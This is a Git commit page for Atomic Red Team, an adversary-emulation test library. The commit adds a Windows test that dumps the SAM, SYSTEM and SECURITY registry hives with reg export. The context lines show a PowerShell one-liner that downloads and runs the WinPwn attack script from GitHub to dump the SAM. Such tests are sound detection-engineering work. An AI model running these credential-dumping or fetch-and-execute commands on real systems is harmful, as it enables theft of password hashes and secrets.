security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update T1003.002.yaml (#2826)

Browse Source 
new atomic test added

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
NeuralGlitch
2024-07-05 22:16:48 +05:30
committed by GitHub
parent f839852779
commit 600767fcca
1 changed files with 18 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003.002/T1003.002.yaml
+18
View File
@@ -172,3 +172,21 @@ atomic_tests:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
name: powershell
- name: Dumping of SAM, creds, and secrets(Reg Export)
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
supported_platforms:
- windows
executor:
command: |
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
cleanup_command: |
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
name: command_prompt
elevation_required: true